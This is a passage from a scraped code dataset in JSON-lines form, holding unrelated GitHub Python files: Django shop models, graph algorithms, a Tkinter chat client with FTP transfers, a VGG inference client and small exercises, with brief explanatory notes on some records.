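    assert predicted.shape == target.shape
    return torch.mean(torch.norm(predicted - target, dim=-1))

def weighted_mpjpe_sketch(predicted, target, w):
    # Same error, scaled by a per-joint weight (e.g. inverse root depth,
    # as used for the trajectory loss above).
    assert predicted.shape == target.shape
    return torch.mean(w * torch.norm(predicted - target, dim=-1))

# Toy tensors shaped (batch, frames, joints, 3):
pred = torch.randn(2, 1, 16, 3)
gt = torch.randn(2, 1, 16, 3)
w = 1.0 / gt[:, :, :1, 2].abs().clamp(min=1e-6)
print(mpjpe_sketch(pred, gt).item())
print(weighted_mpjpe_sketch(pred[:, :, :1], gt[:, :, :1], w).item())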
+{"seq_id":"25170455397","text":"from django.db import models\nfrom django.urls import reverse\nfrom category.models import Category\nfrom tinymce.models import HTMLField\n\nimport os\nfrom PIL import Image\nfrom io import BytesIO\nfrom django.core.files.base import ContentFile\nfrom django.db.models import Avg, Count\n\n# Create your models here.\n\n\nclass Product(models.Model):\n product_name = models.CharField(max_length=200, unique=True)\n slug = models.SlugField(max_length=200, unique=True)\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n main_image_alt = models.CharField(max_length=2000, null=True, blank=True)\n\n description = HTMLField(max_length=7500, blank=True)\n price = models.DecimalField(max_digits=7, decimal_places=2)\n sale_price = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True)\n main_image = models.ImageField(upload_to='photos/products')\n stock = models.IntegerField(blank=True, null=True)\n is_available = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n num_sold = models.IntegerField(default=0)\n\n def average_review(self):\n reviews = ReviewRating.objects.filter(product=self, visible=True).aggregate(average=Avg('rating'))\n avg = 0\n if reviews['average'] is not None:\n avg = float(reviews['average'])\n return avg\n\n def count_review(self):\n reviews = ReviewRating.objects.filter(product=self, visible=True).aggregate(count=Count('id'))\n count = 0\n if reviews['count'] is not None:\n count = int(reviews['count'])\n return count\n else:\n pass\n\n\n def get_url(self):\n return reverse('product_detail', args=[self.category.slug, self.slug])\n\n\n\nclass ProductGallery(models.Model):\n product = models.ForeignKey(Product, default=None, on_delete=models.CASCADE)\n alt_text = models.CharField(max_length=2000, null=True, blank=True)\n image = models.ImageField(upload_to='store/products', max_length=455)\n\n\n def __str__(self):\n return self.product.product_name\n \n class Meta:\n verbose_name = 'product gallery'\n verbose_name_plural = 'product gallery'\n\n\n\n def save(self, *args, **kwargs):\n \n if not self.make_thumbnail():\n # set to a default thumbnail\n raise Exception('Could not create thumbnail - is the file type valid?')\n\n super(ProductGallery, self).save(*args, **kwargs)\n\n def make_thumbnail(self):\n size = 1200\n\n image = Image.open(self.image)\n width, height = image.size\n width = width*size/height\n image.thumbnail((width,size), Image.ANTIALIAS)\n\n thumb_name, thumb_extension = os.path.splitext(self.image.name)\n thumb_extension = thumb_extension.lower()\n thumb_name = thumb_name.split(\"/\")[-1]\n\n thumb_filename = thumb_name + thumb_extension\n\n if thumb_extension in ['.jpg', '.jpeg']:\n FTYPE = 'JPEG'\n elif thumb_extension == '.gif':\n FTYPE = 'GIF'\n elif thumb_extension == '.png':\n FTYPE = 'PNG'\n else:\n return False # Unrecognized file type\n\n # Save thumbnail to in-memory file as StringIO\n temp_thumb = BytesIO()\n image.save(temp_thumb, FTYPE)\n temp_thumb.seek(0)\n\n self.image.save(thumb_filename, ContentFile(temp_thumb.read()), save=False)\n temp_thumb.close()\n\n return True\n\n\n\nclass ReviewRating(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n review = models.TextField(max_length=5000, blank=True) \n rating = models.FloatField()\n visible = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n updated_at = 
models.DateTimeField(auto_now=True)\n name = models.CharField(max_length=100, blank=False)\n email = models.EmailField()\n\n def __str__(self):\n return self.email\n\n\npage_types = [\n (\"about\", \"about\"),\n (\"privacy\", \"privacy\"),\n (\"delivery\", \"delivery\"),\n (\"terms\", \"terms\"),\n\n]\n\n\nclass Pages(models.Model):\n page_title = models.CharField(max_length=500, unique=True, choices=page_types)\n page_content = HTMLField(max_length=10000)\n","repo_name":"Coder-dot-com/Django-Ecommerce-Web-App-Demo","sub_path":"ecommerce_demo/store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
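The make_thumbnail method above resizes the uploaded image with PIL and writes it into an in-memory BytesIO buffer before saving it back onto the ImageField. A standalone sketch of that step is below; note that Image.ANTIALIAS, which the method uses, was removed in Pillow 10, where Image.LANCZOS is the equivalent resampling filter. The file path in the usage comment is hypothetical:

# Standalone sketch of the thumbnail step (paths are hypothetical).
# Image.ANTIALIAS, used in make_thumbnail above, was removed in Pillow 10;
# Image.LANCZOS is the equivalent filter.
from io import BytesIO
from PIL import Image

def make_thumbnail_bytes(src_path, target_height=1200, fmt="JPEG"):
    image = Image.open(src_path)
    width, height = image.size
    new_width = int(width * target_height / height)
    image.thumbnail((new_width, target_height), Image.LANCZOS)
    buf = BytesIO()
    image.save(buf, fmt)  # note: RGBA sources need converting before JPEG
    buf.seek(0)
    return buf.read()

# data = make_thumbnail_bytes("photos/products/example.jpg")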
+{"seq_id":"33743331939","text":"while True:\n n = int(input())\n\n if n == -1:\n break\n\n div = []\n\n for i in range(1, n):\n if n % i == 0:\n div.append(i)\n\n if sum(div) == n:\n print(n, \"=\", end=\" \")\n for i in div:\n if i == div[-1]:\n print(i)\n else:\n print(i, \"+\", end=\" \")\n else:\n print(n, \"is NOT perfect.\")","repo_name":"minhuikim/Algorithm","sub_path":"python/backjoon/9506_sum_of_factors.py","file_name":"9506_sum_of_factors.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"20259680167","text":"from django.forms import HiddenInput, ModelForm, ModelChoiceField\nfrom django.forms.widgets import RadioChoiceInput, RadioSelect\nfrom polls import models\n\n\n\n\nclass VoteForm(ModelForm):\n class Meta:\n model = models.Vote\n fields = ['answer', 'poll']\n answer = ModelChoiceField(queryset=models.Answer.objects.all(), widget=RadioSelect(), required=True, empty_label=None)\n\n def __init__(self, poll=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['poll'].widget = HiddenInput()\n self.fields['answer'].queryset = poll.answer_set\n #self.fields['answer'].empty_label = None\n","repo_name":"poleha/tatamo","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1049687948","text":"import sys\n\nclass Graph:\n def __init__(self, size):\n # implementasi matrix\n self.size = size\n self.graph = [[0 for _ in range(size)] for _ in range(size)]\n\n def add_edge(self, start, dest, weight=1):\n self.graph[start][dest] = weight\n self.graph[dest][start] = weight\n\n def DFS(self,start):\n visited = set()\n print()\n print('DFS:', end='')\n self.DFS_util(start, visited)\n\n def DFS_util(self,start, visited):\n visited.add(start)\n print(start,end='-->')\n for i in range(self.size):\n if i not in visited and self.graph[start][i] > 0:\n self.DFS_util(i, visited)\n\n def to_adjacentList(self):\n \"\"\"mengubah representasi matrix menjadi adjacent list pakai dictionary python\"\"\"\n graph_list = {key:[] for key in range(self.size)}\n for i in range(self.size):\n for j in range(self.size):\n if self.graph[i][j] > 0:\n graph_list[i].append(j)\n return graph_list\n\n def BFS(self, start):\n queue = []\n visited = [False for _ in range(self.size)]\n\n queue.append(start)\n visited[start] = True\n print('BFS:', start, end=\"-->\")\n while queue:\n vertice = queue.pop(0)\n for i in range(self.size):\n if visited[i] is False and self.graph[vertice][i] > 0:\n queue.append(i)\n visited[i] = True\n print(i, end='->')\n\n def print_graph(self):\n for i in self.graph:\n print(i)\n\n def dijkstra(self,start):\n infinity = sys.maxsize\n visited = []\n weight = []\n for i in range(self.size):\n weight.append(infinity)\n\n\n path = {}\n weight[start] = 0\n # isi path adalah nilai path dan prev node\n path[start] = [weight[start], start]\n\n while len(visited) != self.size:\n print()\n print(f\"mulai dari node {start}\")\n visited.append(start)\n # counter untuk tracking index\n counter = 0\n for j in self.graph[start]:\n\n if j > 0 and counter not in visited:\n print(f\"edge ke node {counter}\")\n # calculate distance\n dist = weight[start] + j\n if dist < weight[counter]:\n weight[counter] = dist\n path[counter] = [dist, start]\n print(\"weight edge\", path)\n counter += 1\n\n edges = sorted([index for index in self.graph[start] if index > 0])\n for i in edges:\n if self.graph[start].index(i) not in visited:\n start = self.graph[start].index(i)\n break\n\n\n return path\n\n# class Node:\n# def __init__(self, data):\n# self.data = data\n# self.next = None\n#\n# class Graph:\n# def __init__(self, size):\n# # implementasi adjacent list\n# self.size = size\n# self.graph = [None for _ in range(size)]\n#\n# def add_edge(self, start, dest):\n# new_node = Node(dest)\n# new_node.next = self.graph[start]\n# self.graph[start] = new_node\n#\n# # kalau directed code dibawah ini dihapus\n# new_node = Node(start)\n# new_node.next = self.graph[dest]\n# self.graph[dest] = new_node\n#\n#\n#\n# def print_graph(self):\n# for i in range(len(self.graph)):\n# print('Vertice: ',)\n# itr = self.graph[i]\n# while itr is not None:\n# print(itr.data, end='->')\n# itr = itr.next\n# print()\n\n\ng = Graph(5)\ng.add_edge(0,1, 2)\ng.add_edge(0,2, 1)\ng.add_edge(1,2, 5)\ng.add_edge(2,3, 4)\ng.add_edge(3,4, 2)\ng.add_edge(0,4, 3)\ng.print_graph()\npath = g.dijkstra(0)\nprint(path)\n\n\n\n\n","repo_name":"NicholasL5/BackupSD","sub_path":"pertemuan7/cobaGraph.py","file_name":"cobaGraph.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34681076824","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 30 13:36:58 2021\n\n@author: bing\n\"\"\"\n\n# import all the required modules\n\nimport json\n# file related\nimport os\nimport select\n# import all the required modules\nimport threading\nfrom ftplib import FTP\nfrom pathlib import Path\nfrom tkinter import *\nimport file_opener\nfrom chat_utils import *\nimport pdf_processor\n\n# GUI class for the chat\ndef ftpconnect(host='localhost', port=8888, username=\"Admin\", password=\"Admin\"):\n ftp = FTP()\n ftp.connect(host, port) # Connect the FTP server\n ftp.login(username, password) # Log in\n return ftp\n\n\n# pathlib is good for processing file path, strongly encouraged to learn\ndef download(path=str(Path(__file__).parent / 'user_files' / 'user1')):\n \"\"\"all files on server are stored in path folder\"\"\"\n path = Path(path)\n path.mkdir(parents=True, exist_ok=True)\n ftp = ftpconnect()\n for filename in ftp.nlst():\n with open(path / filename, \"wb\") as f:\n ftp.retrbinary('RETR %s' % filename, f.write)\n ftp.quit()\n\n\ndef upload(path=None):\n ftp = ftpconnect()\n if path is None:\n path = file_opener.file_opener()\n with open(path, 'rb') as contents:\n ftp.storbinary('STOR %s' % os.path.basename(path), contents)\n ftp.quit()\ndef startgame():\n os.system(\"gamerunner.py\")\nclass GUI:\n # constructor method\n def __init__(self, send, recv, sm, s):\n # chat window which is currently hidden\n self.Window = Tk()\n self.Window.withdraw()\n self.send = send\n self.recv = recv\n self.sm = sm\n self.socket = s\n self.my_msg = \"\"\n self.system_msg = \"\"\n\n def login(self):\n # login window\n self.login = Toplevel()\n # set the title\n self.login.title(\"Login\")\n self.login.resizable(width = False, \n height = False)\n self.login.configure(width = 400,\n height = 300)\n # create a Label\n self.pls = Label(self.login, \n text = \"Please login to continue\",\n justify = CENTER, \n font = \"Helvetica 14 bold\")\n \n self.pls.place(relheight = 0.15,\n relx = 0.2, \n rely = 0.07)\n # create a Label\n self.labelName = Label(self.login,\n text = \"Name: \",\n font = \"Helvetica 12\")\n \n self.labelName.place(relheight = 0.2,\n relx = 0.1, \n rely = 0.2)\n \n # create a entry box for \n # tyoing the message\n self.entryName = Entry(self.login, \n font = \"Helvetica 14\")\n \n self.entryName.place(relwidth = 0.4, \n relheight = 0.12,\n relx = 0.35,\n rely = 0.2)\n \n # set the focus of the curser\n self.entryName.focus()\n \n # create a Continue Button \n # along with action\n self.go = Button(self.login,\n text = \"CONTINUE\", \n font = \"Helvetica 14 bold\", \n command = lambda: self.goAhead(self.entryName.get()))\n \n self.go.place(relx = 0.4,\n rely = 0.55)\n self.Window.mainloop()\n \n def goAhead(self, name):\n self.user_name=name\n if len(name) > 0:\n msg = json.dumps({\"action\":\"login\", \"name\": name})\n self.send(msg)\n response = json.loads(self.recv())\n if response[\"status\"] == 'ok':\n self.login.destroy()\n self.sm.set_state(S_LOGGEDIN)\n self.sm.set_myname(name)\n self.layout(name)\n self.textCons.config(state = NORMAL)\n # self.textCons.insert(END, \"hello\" +\"\\n\\n\") \n self.textCons.insert(END, menu +\"\\n\\n\") \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n # while True:\n # self.proc()\n # the thread to receive messages\n process = threading.Thread(target=self.proc)\n process.daemon = True\n process.start()\n \n # The main layout of the chat\n def layout(self,name):\n self.name = 
name\n # to show chat window\n self.Window.deiconify()\n self.Window.title(\"CHATROOM\")\n self.Window.resizable(width = False,\n height = False)\n self.Window.configure(width = 470,\n height = 550,\n bg = \"#17202A\")\n self.labelHead = Label(self.Window,\n bg = \"#17202A\", \n fg = \"#EAECEE\",\n text = self.name ,\n font = \"Helvetica 13 bold\",\n pady = 5)\n \n self.labelHead.place(relwidth = 1)\n self.line = Label(self.Window,\n width = 450,\n bg = \"#ABB2B9\")\n \n self.line.place(relwidth = 1,\n rely = 0.07,\n relheight = 0.012)\n \n self.textCons = Text(self.Window,\n width = 20, \n height = 2,\n bg = \"#17202A\",\n fg = \"#EAECEE\",\n font = \"Helvetica 14\", \n padx = 5,\n pady = 5)\n \n self.textCons.place(relheight = 0.745,\n relwidth = 1, \n rely = 0.08)\n \n self.labelBottom = Label(self.Window,\n bg = \"#ABB2B9\",\n height = 80)\n \n self.labelBottom.place(relwidth = 1,\n rely = 0.825)\n \n self.entryMsg = Entry(self.labelBottom,\n bg = \"#2C3E50\",\n fg = \"#EAECEE\",\n font = \"Helvetica 13\")\n \n # place the given widget\n # into the gui window\n self.entryMsg.place(relwidth = 0.45,\n relheight = 0.06,\n rely = 0.008,\n relx = 0.111)\n def playgame():\n startgame()\n \n self.gamebutton = Button(self.labelBottom,\n text = \"Game\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command =playgame)\n # place the given widget\n # into the gui window\n self.gamebutton.place(relwidth = 0.08,\n relheight = 0.06,\n rely = 0.008,\n relx = 0.011)\n \n self.entryMsg.focus()\n \n def uploading():\n upload()\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,self.user_name+' is uploading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n self.my_msg=' '+self.user_name+' is uploading!'+'\\n\\n'\n\n \n \n \n def download_for_current_user():\n current_path = str(Path(__file__).parent / 'user_files' / self.user_name)\n download(current_path)\n pdf_processor.main(current_path)\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,self.user_name+' is downloading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n self.my_msg=' '+self.user_name+' is downloading!'+'\\n\\n'\n\n \n \n # create a Send Button\n self.buttonMsg = Button(self.labelBottom,\n text = \"Send\",\n font = \"Helvetica 10 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.sendButton(self.entryMsg.get()))\n \n self.buttonMsg.place(relx = 0.77,\n rely = 0.008,\n relheight = 0.024, \n relwidth = 0.22)\n\n self.upload = Button(self.labelBottom,\n text = \"Upload\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command=uploading)\n \n self.upload.place(relx = 0.77,\n rely = 0.038,\n relheight = 0.024, \n relwidth = 0.10)\n self.download = Button(self.labelBottom,\n text = \"Download\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command=download_for_current_user)\n \n self.download.place(relx = 0.88,\n rely = 0.038,\n relheight = 0.024, \n relwidth = 0.10)\n \n self.time = Button(self.labelBottom,\n text = \"Time\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.showtime())\n \n self.time.place(relx = 0.6,\n rely = 0.008,\n relheight = 0.016, \n relwidth = 0.15)\n \n self.connect = Button(self.labelBottom,\n text = \"Connect\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.showconnect())\n \n self.connect.place(relx = 0.6,\n rely = 0.026,\n relheight = 0.016, \n 
relwidth = 0.15)\n \n self.leave = Button(self.labelBottom,\n text = \"Leave\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.sendButton('bye'))\n self.leave.place(relx = 0.6,\n rely = 0.044,\n relheight = 0.016, \n relwidth = 0.15)\n \n \n self.textCons.config(cursor = \"arrow\")\n \n # create a scroll bar\n scrollbar = Scrollbar(self.textCons)\n \n # place the scroll bar \n # into the gui window\n scrollbar.place(relheight = 1,\n relx = 0.974)\n \n scrollbar.config(command = self.textCons.yview)\n \n self.textCons.config(state = DISABLED)\n \n # function to basically start the thread for sending messages\n def sendButton(self, msg):\n self.textCons.config(state = DISABLED)\n self.my_msg = msg\n # print(msg)\n self.entryMsg.delete(0, END)\n \n def showtime(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'Time: '+time.strftime('%d.%m.%y,%H:%M', time.localtime())+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n \n def showconnect(self):\n if self.entryMsg.get()=='':\n self.my_msg= 'who'\n else:\n target=self.entryMsg.get()\n self.my_msg= 'c '+target\n self.entryMsg.delete(0, END)\n \n def showupload(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'uploading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n \n def showdownload(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'downloading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n\n def proc(self):\n # print(self.msg)\n while True:\n read, write, error = select.select([self.socket], [], [], 0)\n peer_msg = []\n # print(self.msg)\n if self.socket in read:\n peer_msg = self.recv()\n if len(self.my_msg) > 0 or len(peer_msg) > 0:\n # print(self.system_msg)\n self.system_msg += self.sm.proc(self.my_msg, peer_msg)\n self.my_msg = \"\"\n self.textCons.config(state = NORMAL)\n self.textCons.insert(END, self.system_msg +'\\n\\n') \n self.textCons.config(state = DISABLED)\n self.system_msg=''\n self.textCons.see(END)\n \n \n\n def run(self):\n self.login()\n \n\n# create a GUI class object\nif __name__ == \"__main__\": \n g = GUI()\n","repo_name":"zc2214/ICS_Chat_System","sub_path":"final project/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
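The ftpconnect, upload and download helpers in the record above open a fresh connection and call quit() for every transfer, with the host, port and Admin credentials hard-coded as defaults. Since Python 3.3 ftplib.FTP is also a context manager, so the download loop can be written as below, which closes the connection even if a transfer raises; the connection details simply mirror the defaults assumed in the code above:

# Sketch of the download helper using ftplib's context-manager support
# (Python 3.3+); host, port and credentials mirror the defaults above.
from ftplib import FTP
from pathlib import Path

def download_all(dest, host="localhost", port=8888, user="Admin", password="Admin"):
    dest = Path(dest)
    dest.mkdir(parents=True, exist_ok=True)
    with FTP() as ftp:  # connection is closed even if a transfer fails
        ftp.connect(host, port)
        ftp.login(user, password)
        for filename in ftp.nlst():
            with open(dest / filename, "wb") as f:
                ftp.retrbinary("RETR %s" % filename, f.write)

# download_all(Path(__file__).parent / "user_files" / "user1")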
+{"seq_id":"41765283157","text":"def C(j, cost):\n global res\n\n if j == N:\n if res > cost:\n res = cost\n return\n\n if res < cost:\n return\n\n for i in range(N):\n if not visit[i]:\n visit[i] = 1\n C(j+1, cost + board[j][i])\n visit[i] = 0\n\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n board = [list(map(int, input().split())) for _ in range(N)]\n visit = [0]*N\n res = 9999999\n\n C(0, 0)\n print('#{} {}'.format(t, res))","repo_name":"Fly-Eugene/algo_study","sub_path":"재식/24sort_swea5209_최소생산.py","file_name":"24sort_swea5209_최소생산.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28646551340","text":"import socket # 导入 socket 模块\nimport argparse\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom PIL import Image\nfrom models import *\n\n\nclass ClientInf:\n\n\n def __init__(self):\n\n rdb = None\n cacheResults = {}\n self.model = None\n self.ServerHost = None\n self.ServerPort = None\n\n\n def loadModel(self):\n self.model = myvgg.myVgg(part=0, st=0, ed=18)\n\n print(self.model)\n # model = myresnet.myResnet18(part=1)\n\n pth = \"../checks/vgg16-397923af.pth\"\n\n checkpoint = torch.load(pth)\n\n self.model.load_state_dict(checkpoint,False)\n return\n\n def getServer(self): #sss\n\n\n\n return\n\n\n\n def getData(self):\n # 加载数据\n dat = datasets.CIFAR10('/Users/huchuanwen/hcw/graduate/rethinking-network-pruning/cifar/l1-norm-pruning/data.cifar10', train=True, download=True,\n transform=transforms.Compose([\n # transforms.Pad(4),\n # transforms.RandomCrop(32),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ]))\n img = transforms.ToPILImage(dat.data[0])\n\n img = dat.data[0] # plt.imshow()只能接受3-D Tensor,所以也要用image[0]消去batch那一维\n\n testData = np.transpose(dat.data[0], (2, 0, 1))\n testData = torch.from_numpy(testData).float()\n testData = torch.unsqueeze(testData, dim=0)\n return testData\n\n def getDatas(self, num=10):\n # 加载数据\n\n dats = []\n targets = []\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])),\n batch_size=1, shuffle=True)\n\n cnt = 0\n for data, target in test_loader:\n\n dats.append(data)\n\n targets.append(target)\n\n cnt += 1\n if cnt >= num:\n break\n # data, target = Variable(data, volatile=True), Variable(target)\n\n return dats,targets\n # testData = np.transpose(dat.data[0], (2, 0, 1))\n # testData = torch.from_numpy(testData).float()\n # testData = torch.unsqueeze(testData, dim=0)\n\n\n def inf(self, dat):\n # 装载模型\n\n\n with torch.no_grad():\n # 推理\n\n\n\n model = self.model\n model.eval()\n output = model(dat)\n\n\n\n\n # print(sys.getsizeof(output))\n # print(sys.getsizeof(output.numpy()))\n # print(output.shape)\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n # # correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n # print(pred)\n\n return pred\n\n\nif __name__==\"__main__\":\n cli = ClientInf()\n cli.loadModel()\n\n import cv2\n\n camera_index = 0\n cap = cv2.VideoCapture(camera_index)\n ret, frame = cap.read()\n\n\n val_transforms = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((.5, .5, .5), (.5, .5, .5))\n ])\n\n\n img = val_transforms(Image.fromarray(frame))\n\n img = torch.unsqueeze(img, dim=0).float()\n\n index = cli.inf(img)\n\n import json\n\n with open('./imgs/imagenetLabel.json') as f:\n labels = json.load(f)\n\n\n def class_id_to_label(i):\n return labels[i]\n\n print(class_id_to_label(index))\n\n cv2.imshow('frame', frame)\n key2 = cv2.waitKey(0)","repo_name":"hucw999/collaborativeDL","sub_path":"ClientInf.py","file_name":"ClientInf.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23656337661","text":"# Ստեղծեք Car class-ը, որն ունի հետևյալ attribute-ները՝ model, color և max_speed։\n# Ստեղծեք compareCar(self, car2) մեթոդը, որը ստանում է ևս մեկ Car տիպի object\n# որպես argument ու կվերադարձնում է “car1 is better than car2” եթե ձեր մեքենայի\n# maxSpeed attribute-ի արժեքը մեծ է car2-ի maxSpeed attribute-ի արժեքից և “car2 is\n# better than car1”՝ հակառակ դեպքում։\n# Փորձարկեք class-ի աշխատանքը ստեղծելով այդ class-ի object(ներ)։\n\nclass Car: \n def __init__(self, model, color, max_speed): \n self.model = model\n self.color = color\n self.max_speed = max_speed\n \n def compareCar(self, car2): \n if self.max_speed > car2.max_speed: \n return print(\"car1 is better than car2\")\n else: \n return print(\"car2 is better than car1\")\n\n\ncar1 = Car(\"BMW\", \"black\", 250)\ncar2 = Car(\"Mercedez\", \"white\", 270)\n\ncar1.compareCar(car2)\n","repo_name":"ChessLover/Python1_HW","sub_path":"Week7/Practical/Practical_2.py","file_name":"Practical_2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11252744966","text":"# pythonpath modification to make hytra and empryonic available \n# for import without requiring it to be installed\nfrom __future__ import print_function, absolute_import, nested_scopes, generators, division, with_statement, unicode_literals\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('..'))\n# standard imports\nimport logging\nimport configargparse as argparse\nfrom hytra.core.jsongraph import JsonTrackingGraph, writeToFormattedJSON\nfrom hytra.core.jsonmergerresolver import JsonMergerResolver\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Given a hypotheses json graph and a result.json, this script'\n + ' resolves all mergers by updating the segmentation and inserting the appropriate '\n + 'nodes and links.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--config', is_config_file=True, help='config file path', dest='config_file')\n\n parser.add_argument('--graph-json-file', required=True, type=str, dest='model_filename',\n help='IN Filename of the json model description')\n parser.add_argument('--result-json-file', required=True, type=str, dest='result_filename',\n help='IN Filename of the json file containing results')\n parser.add_argument('--label-image-file', required=True, type=str, dest='label_image_filename',\n help='IN Filename of the original ilasitk tracking project')\n parser.add_argument('--label-image-path', dest='label_image_path', type=str,\n default='/TrackingFeatureExtraction/LabelImage/0000/[[%d, 0, 0, 0, 0], [%d, %d, %d, %d, 1]]',\n help='internal hdf5 path to label image')\n parser.add_argument('--raw-data-file', type=str, dest='raw_filename', default=None,\n help='filename to the raw h5 file')\n parser.add_argument('--raw-data-path', type=str, dest='raw_path', default='volume/data',\n help='Path inside the raw h5 file to the data')\n parser.add_argument(\"--raw-data-axes\", dest='raw_axes', type=str, default='txyzc',\n help=\"axes ordering of the produced raw image, e.g. 
xyztc.\")\n parser.add_argument('--transition-classifier-file', dest='transition_classifier_filename', type=str,\n default=None, help=\"Transition classifier filename, or None if distance-based energies should be used.\")\n parser.add_argument('--transition-classifier-path', dest='transition_classifier_path', type=str, default='/')\n parser.add_argument('--out-graph-json-file', type=str, dest='out_model_filename', required=True, \n help='Filename of the json model containing the hypotheses graph including new nodes')\n parser.add_argument('--out-label-image-file', type=str, dest='out_label_image', required=True, \n help='Filename where to store the label image with updated segmentation')\n parser.add_argument('--out-result-json-file', type=str, dest='out_result', required=True, \n help='Filename where to store the new result')\n parser.add_argument('--trans-par', dest='trans_par', type=float, default=5.0,\n help='alpha for the transition prior')\n parser.add_argument('--verbose', dest='verbose', action='store_true',\n help='Turn on verbose logging', default=False)\n parser.add_argument('--plugin-paths', dest='pluginPaths', type=str, nargs='+',\n default=[os.path.abspath('../hytra/plugins')],\n help='A list of paths to search for plugins for the tracking pipeline.')\n args, _ = parser.parse_known_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n \n trackingGraph = JsonTrackingGraph(model_filename=args.model_filename, result_filename=args.result_filename)\n\n merger_resolver = JsonMergerResolver(trackingGraph,\n args.label_image_filename,\n args.label_image_path,\n args.out_label_image,\n args.raw_filename,\n args.raw_path,\n args.raw_axes,\n args.pluginPaths,\n args.verbose)\n merger_resolver.run(\n args.transition_classifier_filename,\n args.transition_classifier_path)\n\n # save\n writeToFormattedJSON(args.out_model_filename, merger_resolver.model)\n writeToFormattedJSON(args.out_result, merger_resolver.result)\n","repo_name":"chaubold/hytra","sub_path":"scripts/run_merger_resolving.py","file_name":"run_merger_resolving.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"32635501167","text":"# type: ignore\n# pylint: skip-file\n\nimport os\nimport json\nimport re\nimport argparse\nfrom collections import Counter, defaultdict\nimport pandas as pd\nfrom prettytable import PrettyTable\nfrom joblib import Parallel, delayed, parallel_backend, Memory\n\n# Setup a memory location for caching purposes\nlocation = \"/tmp/joblib_cache\"\nmemory = Memory(location, verbose=0)\n\n# Let's make handle_exception and reading of files an atomic operation using joblib's Memory\n@memory.cache\ndef handle_exception_and_read_file(file):\n with open(file) as f:\n error_log = json.load(f)\n\n try:\n exception = handle_exception(error_log[\"exception\"])\n return exception, error_log\n except KeyError:\n print(f\"Key 'exception' not found in file {file}\")\n print(f\"Contents of the file: {error_log}\")\n return \"exception_key_not_found\", None\n\n\n# Known exception patterns\nexception_patterns = [\n (re.compile(r\"has no attribute\"), \"Numpy_bug\"),\n (re.compile(r\"Unable to allocate\"), \"Memory_error\"),\n (re.compile(r\"There are significant negative eigenvalues\"), \"Neg_eigenvals\"),\n 